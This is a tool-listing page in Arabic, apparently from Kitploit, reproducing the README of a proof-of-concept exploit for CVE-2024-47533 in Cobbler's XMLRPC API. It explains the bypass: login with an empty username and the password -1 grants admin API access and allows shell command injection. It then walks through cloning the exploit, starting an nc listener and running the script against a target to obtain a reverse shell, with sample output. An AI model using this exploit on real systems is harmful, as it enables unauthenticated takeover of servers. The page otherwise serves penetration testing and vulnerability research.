Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-47533-PoC — إثبات مفهوم الاستغلال لـ CVE-2024-47533، وهو تجاوز للمصادقة في واجهة برمجة تطبيقات XMLRPC الخاصة بـ Cobbler مما يؤدي إلى تنفيذ كود عن بُعد غير مصرح به وصدفة عكسية. | Kitploit
أدوات/GitHubGitHub/00xcanelo/cve-2024-47533-poc
المصادقة والترخيصالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

إثبات مفهوم الاستغلال لـ CVE-2024-47533، وهو تجاوز للمصادقة في واجهة برمجة تطبيقات XMLRPC الخاصة بـ Cobbler مما يؤدي إلى تنفيذ كود عن بُعد غير مصرح به وصدفة عكسية.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-47533 – تجاوز التحقق في Cobbler XMLRPC → شل عكسية (RCE غير مصادق)

📌 ملخص

يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال الثغرة CVE-2024-47533،
وهو تجاوز تحقق خطير في واجهة Cobbler XMLRPC API يؤدي إلى تنفيذ أكواد عن بُعد بدون مصادقة (RCE).

يستغل هذا الإكسبلويت خلل طريقة login() في واجهة XMLRPC لتجاوز التحقق وحقن أمر شل عكسية عبر background_import().


⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والبحثية واختبار الاختراق المصرح به فقط.
لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار.


🛠 تفاصيل تقنية

  • نوع الثغرة: تجاوز التحقق → RCE
  • المكون المتأثر: واجهة Cobbler XMLRPC API
  • ناقل الهجوم: شبكة
  • الصلاحيات المطلوبة: لا شيء
  • تفاعل المستخدم: لا شيء

السبب الجذري:
utils.get_shared_secret() تعيد بشكل غير صحيح -1 بسبب سوء معالجة قراءة الملفات في الوضع الثنائي مع ترميز، مما يسمح بالمصادقة باسم مستخدم فارغ وكلمة مرور -1.

التأثير:
يمكن للمهاجم:

  • الحصول على وصول API بمستوى مدير
  • حقن أوامر نظام عشوائية في قوالب Cobbler
  • تشغيل شل عكسية على الهدف

🚀 الاستخدام

1️⃣ استنساخ المستودع

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ إعداد مستمع

على جهاز المهاجم:

root@kitploit:~
nc -lvnp 4444

3️⃣ تشغيل الإكسبلويت

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

مثال:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 هيكل الملفات

root@kitploit:~
.
├── CVE-2024-47533.py  # سكريبت استغلال الشل العكسية
└── README.md          # التوثيق

📸 مثال على المخرجات

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.

🧑‍💻 المؤلف

00xCanelo
ملف GitHub الشخصي


📚 المراجع

  • NVD: CVE-2024-47533
  • مشروع Cobbler على GitHub
تنزيل الأداة